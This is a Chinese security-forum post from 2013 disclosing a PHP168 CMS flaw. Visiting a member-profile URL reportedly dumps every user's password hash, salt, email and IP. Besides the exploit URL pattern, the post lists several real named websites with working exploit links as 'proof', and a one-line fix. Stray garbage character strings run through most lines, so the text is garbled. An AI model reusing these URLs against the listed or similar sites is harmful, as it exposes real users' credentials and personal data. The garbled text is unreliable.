中国网络渗透测试联盟

标题: PHP168漏洞可查询任意用户数据 [打印本页]

作者: admin 时间: 2013-9-21 16:02
标题: PHP168漏洞可查询任意用户数据
简要描述：

国微PHP168中出现了一处神奇的array，可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。

详细说明：

PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中，这个页面不会在前台使用，但可直接通过URL进行访问。页面路由为：/homepage.php/[用户名]/member-profile! Q7 a$ {+ p Q( l; c; @
2 p) e4 R& |/ F) T* v
以PHP168官方演示站点为例，查看任意用户信息的页面链接为：6 ]7 \" h& z( M5 ^/ e! ^

?) h9 z) N t0 Y+ I9 h1 thttp://php168.cn/com/homepage.php/admin/member-profile" {' N7 D L( ?" f
8 l& y- k( _! ?2 H, i) W* n
由于该模块代码中出现了一句神奇的array，导致用户数据表内所有数据被当作数组取出直接显示出来。$ w8 q% l& @1 X
http://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg
8 {/ h) v) P; X7 K) N/ Y8 G2 T! t3 i1 f8 @1 Y0 j0 ]

漏洞证明：

该漏洞影响使用该CMS系统的站点，以PHP168官网上的客户案例为例：
% Z$ P3 {7 u1 F! a9 {+ |: e& q' ?- }
http://www.zjfzol.com.cn/homepage.php/admin/member-profile
5 o  Y5 W  f1 Q3 Q
& y9 ]9 {8 l. s9 @% G8 D3 |* R( X1 Z& thttp://www.scswl.cn/homepage.php/admin/member-profile
7 H% i( L5 Q# X; @% W& z& u* S
6 O7 H* Q" L* H2 Z  c$ D& S6 @http://www.tunet.edu.cn/homepage.php/admin/member-profile0 R) [5 c7 X& W9 }- p

; I1 x4 n9 R7 s, xhttp://www.itlead.com.cn/homepage.php/admin/member-profile( M: h# q& j4 K
* w; p9 i4 ~! X  S
http://www.aedp.cn/homepage.php/admin/member-profile
4 d, X. \( y7 z- u
" P2 h6 b6 {% F. O8 h) khttp://www.qianlongnews.com/homepage.php/test/member-profile/ l, ^+ t+ W+ I9 _
% S! Z4 i' H6 x
http://ny.zlxk.com/gov/homepage.php/admin/member-profile

修复方案：

去掉输出

[/td][/tr]
[/table]

欢迎光临中国网络渗透测试联盟 (https://www.cobjon.com/)